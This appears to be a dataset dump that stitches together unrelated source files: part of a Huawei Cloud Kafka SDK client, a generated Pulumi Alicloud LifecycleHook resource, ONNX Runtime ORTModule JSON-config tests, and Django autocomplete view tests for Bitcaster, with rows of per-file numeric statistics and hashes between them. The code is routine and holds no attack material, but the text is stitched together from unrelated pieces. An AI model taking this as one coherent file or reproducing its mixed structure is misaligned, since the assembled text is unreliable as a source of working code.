self.update_topic_replica_with_http_info(request) def update_topic_replica_with_http_info(self, request): """修改Kafka实例Topic分区的副本 修改Kafka实例Topic分区的副本。 :param UpdateTopicReplicaRequest request :return: UpdateTopicReplicaResponse """ all_params = ['instance_id', 'topic', 'update_topic_replica_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/replicas-reassignment', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateTopicReplicaResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None, post_params=None, response_type=None, response_headers=None, auth_settings=None, collection_formats=None, request_type=None): """Makes the HTTP request and returns deserialized data. :param resource_path: Path to method endpoint. :param method: Method to call. :param path_params: Path parameters in the url. :param query_params: Query parameters in the url. :param header_params: Header parameters to be placed in the request header. :param body: Request body. :param post_params dict: Request post form parameters, for `application/x-www-form-urlencoded`, `multipart/form-data`. :param auth_settings list: Auth Settings names for the request. :param response_type: Response data type. :param response_headers: Header should be added to response data. :param collection_formats: dict of collection formats for path, query, header, and post parameters. :param request_type: Request data type. :return: Return the response directly. """ return self.do_http_request( method=method, resource_path=resource_path, path_params=path_params, query_params=query_params, header_params=header_params, body=body, post_params=post_params, response_type=response_type, response_headers=response_headers, collection_formats=collection_formats, request_type=request_type, async_request=True)
31.278557
410
0.63364
10,748
109,256
6.032936
0.042799
0.041701
0.072977
0.02887
0.91598
0.900928
0.87505
0.847259
0.829894
0.699577
0
0.001259
0.280204
109,256
3,492
411
31.287514
0.823262
0.123636
0
0.825325
0
0.001001
0.121947
0.05455
0
0
0
0
0
1
0.053554
false
0.008509
0.005005
0
0.113614
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
d2b05392d80b7fabf34bae9a3f799560c2f98f4c
23,788
py
Python
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
42
2019-03-18T06:34:37.000Z
2022-03-24T07:08:57.000Z
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
152
2019-04-15T21:03:44.000Z
2022-03-29T18:00:57.000Z
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
3
2020-08-26T17:30:07.000Z
2021-07-05T01:37:45.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['LifecycleHookArgs', 'LifecycleHook'] @pulumi.input_type class LifecycleHookArgs: def __init__(__self__, *, lifecycle_transition: pulumi.Input[str], scaling_group_id: pulumi.Input[str], default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a LifecycleHook resource. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. """ pulumi.set(__self__, "lifecycle_transition", lifecycle_transition) pulumi.set(__self__, "scaling_group_id", scaling_group_id) if default_result is not None: pulumi.set(__self__, "default_result", default_result) if heartbeat_timeout is not None: pulumi.set(__self__, "heartbeat_timeout", heartbeat_timeout) if name is not None: pulumi.set(__self__, "name", name) if notification_arn is not None: pulumi.set(__self__, "notification_arn", notification_arn) if notification_metadata is not None: pulumi.set(__self__, "notification_metadata", notification_metadata) @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> pulumi.Input[str]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. """ return pulumi.get(self, "lifecycle_transition") @lifecycle_transition.setter def lifecycle_transition(self, value: pulumi.Input[str]): pulumi.set(self, "lifecycle_transition", value) @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> pulumi.Input[str]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ return pulumi.get(self, "scaling_group_id") @scaling_group_id.setter def scaling_group_id(self, value: pulumi.Input[str]): pulumi.set(self, "scaling_group_id", value) @property @pulumi.getter(name="defaultResult") def default_result(self) -> Optional[pulumi.Input[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. """ return pulumi.get(self, "default_result") @default_result.setter def default_result(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_result", value) @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> Optional[pulumi.Input[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @heartbeat_timeout.setter def heartbeat_timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "heartbeat_timeout", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> Optional[pulumi.Input[str]]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @notification_arn.setter def notification_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_arn", value) @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> Optional[pulumi.Input[str]]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. """ return pulumi.get(self, "notification_metadata") @notification_metadata.setter def notification_metadata(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_metadata", value) @pulumi.input_type class _LifecycleHookState: def __init__(__self__, *, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering LifecycleHook resources. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ if default_result is not None: pulumi.set(__self__, "default_result", default_result) if heartbeat_timeout is not None: pulumi.set(__self__, "heartbeat_timeout", heartbeat_timeout) if lifecycle_transition is not None: pulumi.set(__self__, "lifecycle_transition", lifecycle_transition) if name is not None: pulumi.set(__self__, "name", name) if notification_arn is not None: pulumi.set(__self__, "notification_arn", notification_arn) if notification_metadata is not None: pulumi.set(__self__, "notification_metadata", notification_metadata) if scaling_group_id is not None: pulumi.set(__self__, "scaling_group_id", scaling_group_id) @property @pulumi.getter(name="defaultResult") def default_result(self) -> Optional[pulumi.Input[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. """ return pulumi.get(self, "default_result") @default_result.setter def default_result(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_result", value) @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> Optional[pulumi.Input[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @heartbeat_timeout.setter def heartbeat_timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "heartbeat_timeout", value) @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> Optional[pulumi.Input[str]]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. """ return pulumi.get(self, "lifecycle_transition") @lifecycle_transition.setter def lifecycle_transition(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "lifecycle_transition", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> Optional[pulumi.Input[str]]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @notification_arn.setter def notification_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_arn", value) @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> Optional[pulumi.Input[str]]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. """ return pulumi.get(self, "notification_metadata") @notification_metadata.setter def notification_metadata(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_metadata", value) @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ return pulumi.get(self, "scaling_group_id") @scaling_group_id.setter def scaling_group_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "scaling_group_id", value) class LifecycleHook(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None, __props__=None): """ ## Import Ess lifecycle hook can be imported using the id, e.g. ```sh $ pulumi import alicloud:ess/lifecycleHook:LifecycleHook example ash-l12345 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ ... @overload def __init__(__self__, resource_name: str, args: LifecycleHookArgs, opts: Optional[pulumi.ResourceOptions] = None): """ ## Import Ess lifecycle hook can be imported using the id, e.g. ```sh $ pulumi import alicloud:ess/lifecycleHook:LifecycleHook example ash-l12345 ``` :param str resource_name: The name of the resource. :param LifecycleHookArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(LifecycleHookArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = LifecycleHookArgs.__new__(LifecycleHookArgs) __props__.__dict__["default_result"] = default_result __props__.__dict__["heartbeat_timeout"] = heartbeat_timeout if lifecycle_transition is None and not opts.urn: raise TypeError("Missing required property 'lifecycle_transition'") __props__.__dict__["lifecycle_transition"] = lifecycle_transition __props__.__dict__["name"] = name __props__.__dict__["notification_arn"] = notification_arn __props__.__dict__["notification_metadata"] = notification_metadata if scaling_group_id is None and not opts.urn: raise TypeError("Missing required property 'scaling_group_id'") __props__.__dict__["scaling_group_id"] = scaling_group_id super(LifecycleHook, __self__).__init__( 'alicloud:ess/lifecycleHook:LifecycleHook', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None) -> 'LifecycleHook': """ Get an existing LifecycleHook resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _LifecycleHookState.__new__(_LifecycleHookState) __props__.__dict__["default_result"] = default_result __props__.__dict__["heartbeat_timeout"] = heartbeat_timeout __props__.__dict__["lifecycle_transition"] = lifecycle_transition __props__.__dict__["name"] = name __props__.__dict__["notification_arn"] = notification_arn __props__.__dict__["notification_metadata"] = notification_metadata __props__.__dict__["scaling_group_id"] = scaling_group_id return LifecycleHook(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="defaultResult") def default_result(self) -> pulumi.Output[Optional[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. """ return pulumi.get(self, "default_result") @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> pulumi.Output[Optional[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> pulumi.Output[str]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. """ return pulumi.get(self, "lifecycle_transition") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> pulumi.Output[str]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> pulumi.Output[str]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. """ return pulumi.get(self, "notification_metadata") @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> pulumi.Output[str]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ return pulumi.get(self, "scaling_group_id")
53.576577
347
0.686312
2,862
23,788
5.508386
0.070929
0.066286
0.071043
0.066984
0.891468
0.878846
0.873708
0.862226
0.851633
0.824167
0
0.002875
0.225156
23,788
443
348
53.697517
0.852431
0.398899
0
0.751908
1
0
0.119592
0.01882
0
0
0
0
0
1
0.160305
false
0.003817
0.019084
0
0.274809
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
d2bcff7c0c3b8ff2bd06954889ab4ed80532302f
5,185
py
Python
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
1
2022-02-23T07:36:58.000Z
2022-02-23T07:36:58.000Z
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
10
2022-02-15T21:52:24.000Z
2022-02-23T21:26:01.000Z
orttraining/orttraining/test/python/orttraining_test_ortmodule_experimental_json_config.py
lchang20/onnxruntime
97b8f6f394ae02c73ed775f456fd85639c91ced1
[ "MIT" ]
null
null
null
import os import torch from onnxruntime.training import ortmodule from onnxruntime.capi import _pybind_state as C from onnxruntime.training.ortmodule.experimental.json_config import load_from_json class Net(torch.nn.Module): def __init__(self, input_size=784, hidden_size=500, num_classes=10): super(Net, self).__init__() self.fc1 = torch.nn.Linear(input_size, hidden_size) self.relu = torch.nn.ReLU() self.fc2 = torch.nn.Linear(hidden_size, num_classes) def forward(self, input1): out = self.fc1(input1) out = self.relu(out) out = self.fc2(out) return out def test_load_config_from_json_1(): device = 'cuda' model = ortmodule.ORTModule(Net().to(device)) # load from json once. path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_2.json') load_from_json(model, path_to_json) # load from json another time path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_1.json') load_from_json(model, path_to_json) for training_mode in [True, False]: ort_model_attributes = model._torch_module._execution_manager(training_mode) # test propagate cast ops assert ort_model_attributes._propagate_cast_ops_strategy == C.PropagateCastOpsStrategy.FLOOD_FILL assert ort_model_attributes._propagate_cast_ops_level == 3 assert ort_model_attributes._propagate_cast_ops_allow == ["ABC", "DEF"] # test use external gpu allocator assert ort_model_attributes._use_external_gpu_allocator == False # test enable custom autograd function assert ort_model_attributes._enable_custom_autograd_function == True # test allow layer norm mod precision assert ort_model_attributes._allow_layer_norm_mod_precision == True # test use static shape assert ort_model_attributes._use_static_shape == True # test run symbolic shape inference assert ort_model_attributes._run_symbolic_shape_infer == False # test enable grad acc optimization assert ort_model_attributes._enable_grad_acc_optimization == True # test skip check assert ort_model_attributes._skip_check.value == 14 # test debug options assert ort_model_attributes._debug_options.save_onnx_models.save == True assert ort_model_attributes._debug_options.save_onnx_models.name_prefix == 'my_model' assert ort_model_attributes._debug_options.logging.log_level.name == "VERBOSE" # test use memory aware gradient builder. assert ort_model_attributes._use_memory_efficient_gradient == False # test fallback policy assert ort_model_attributes._fallback_manager.policy.value == 1 # assert onnx opset version assert ortmodule.ONNX_OPSET_VERSION == 13 def test_load_config_from_json_2(): device = 'cuda' model = ortmodule.ORTModule(Net().to(device)) # load from json once. path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_1.json') load_from_json(model, path_to_json) # load from json another time path_to_json = os.path.join(os.getcwd(), 'orttraining_test_ortmodule_experimental_json_config_2.json') load_from_json(model, path_to_json) for training_mode in [True, False]: ort_model_attributes = model._torch_module._execution_manager(training_mode) # test propagate cast ops assert ort_model_attributes._propagate_cast_ops_strategy == C.PropagateCastOpsStrategy.INSERT_AND_REDUCE assert ort_model_attributes._propagate_cast_ops_level == 5 assert ort_model_attributes._propagate_cast_ops_allow == ["XYZ", "PQR"] # test use external gpu allocator assert ort_model_attributes._use_external_gpu_allocator == True # test enable custom autograd function assert ort_model_attributes._enable_custom_autograd_function == False # test allow layer norm mod precision assert ort_model_attributes._allow_layer_norm_mod_precision == False # test use static shape assert ort_model_attributes._use_static_shape == False # test run symbolic shape inference assert ort_model_attributes._run_symbolic_shape_infer == True # test enable grad acc optimization assert ort_model_attributes._enable_grad_acc_optimization == False # test skip check assert ort_model_attributes._skip_check.value == 10 # test debug options assert ort_model_attributes._debug_options.save_onnx_models.save == True assert ort_model_attributes._debug_options.save_onnx_models.name_prefix == 'my_other_model' assert ort_model_attributes._debug_options.logging.log_level.name == "INFO" # test use memory aware gradient builder. assert ort_model_attributes._use_memory_efficient_gradient == True # test fallback policy assert ort_model_attributes._fallback_manager.policy.value == 250 # assert onnx opset version assert ortmodule.ONNX_OPSET_VERSION == 12
39.280303
112
0.734041
674
5,185
5.237389
0.194362
0.072521
0.163173
0.203966
0.843059
0.843059
0.828895
0.828895
0.777904
0.747875
0
0.008193
0.199614
5,185
131
113
39.580153
0.84241
0.150241
0
0.272727
0
0
0.065128
0.053016
0
0
0
0
0.484848
1
0.060606
false
0
0.075758
0
0.166667
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
824ebbcc69de0f98edb989ba3f25e9b4815bca36
5,651
py
Python
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
4
2018-03-01T10:22:30.000Z
2020-04-04T16:31:11.000Z
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
60
2018-05-20T04:42:32.000Z
2022-02-10T17:03:37.000Z
tests/web/views/test_autocomplete.py
bitcaster-io/bitcaster
9f1bad96e00e3bc78a22451731e231d30662b166
[ "BSD-3-Clause" ]
1
2018-08-04T05:06:45.000Z
2018-08-04T05:06:45.000Z
import pytest from django.urls import reverse pytestmark = pytest.mark.django_db # UserAutocomplete def test_userautocomplete_full(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == user.email def test_userautocomplete_query(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == user.email def test_userautocomplete_anonymous(django_app, organization1): url = reverse('user-autocomplete') user = organization1.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url) assert res.status_code != 200 # now 302 should be 401 ? # ChannelAutocomplete def test_channelautocomplete_full(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == channel1.name def test_channelautocomplete_query(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner url = '%s?q=%s' % (url, channel1.name) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == channel1.name def test_channelautocomplete_anonymous(django_app, channel1): organization = channel1.organization url = reverse('channel-autocomplete', args=[organization.slug]) user = organization.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url) assert res.status_code != 200 # now 302 should be 401 ? # AddressAutocomplete def test_addressautocomplete_full(django_app, organization_member): url = reverse('address-autocomplete') user = organization_member.user res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user.addresses.first()) def test_addressautocomplete_query(django_app, organization_member): url = reverse('address-autocomplete') user = organization_member.user url = '%s?q=%s' % (url, user.addresses.first().label) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user.addresses.first()) # ApplicationAutocomplete def test_applicationutocomplete_full(django_app, application1): url = reverse('application-autocomplete', args=[application1.organization.slug]) user = application1.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == application1.name def test_applicationautocomplete_query(django_app, application1): url = reverse('application-autocomplete', args=[application1.organization.slug]) user = application1.organization.owner url = '%s?q=%s' % (url, application1.name) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == application1.name # OrganizationMembersAutocomplete def test_organization_memberautocomplete_full(django_app, organization_member): url = reverse('org-member-autocomplete', args=[organization_member.organization.slug]) user = organization_member.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_organization_memberautocomplete_query(django_app, organization_member): url = reverse('org-member-autocomplete', args=[organization_member.organization.slug]) user = organization_member.user url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) # ApplicationMembersAutocomplete def test_application_memberautocomplete_full(django_app, application_member): url = reverse('app-member-autocomplete', args=[application_member.application.organization.slug, application_member.application.slug]) user = application_member.application.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_application_memberautocomplete_query(django_app, application_member): url = reverse('app-member-autocomplete', args=[application_member.application.organization.slug, application_member.application.slug]) user = application_member.application.organization.owner url = '%s?q=%s' % (url, str(user)) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) # ApplicationCandidateAutocomplete def test_application_candidate_autocomplete_full(django_app, application1, organization_member): url = reverse('app-candidate-autocomplete', args=[application1.organization.slug, application1.slug]) user = application1.organization.owner res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user) def test_application_candidate_autocomplete_query(django_app, application1, organization_member): url = reverse('app-candidate-autocomplete', args=[application1.organization.slug, application1.slug]) user = application1.organization.owner url = '%s?q=%s' % (url, user.email) res = django_app.get(url, user=user) assert res.json['results'][0]['text'] == str(user)
36.224359
100
0.702707
659
5,651
5.881639
0.095599
0.074303
0.049536
0.06192
0.839267
0.823787
0.823787
0.816821
0.816821
0.816821
0
0.01362
0.168466
5,651
155
101
36.458065
0.811236
0.039639
0
0.757576
0
0
0.103378
0.035444
0
0
0
0
0.161616
1
0.161616
false
0
0.020202
0
0.181818
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82895a4947ee65f734f316b39cf83e5a328bf2ec
9,282
py
Python
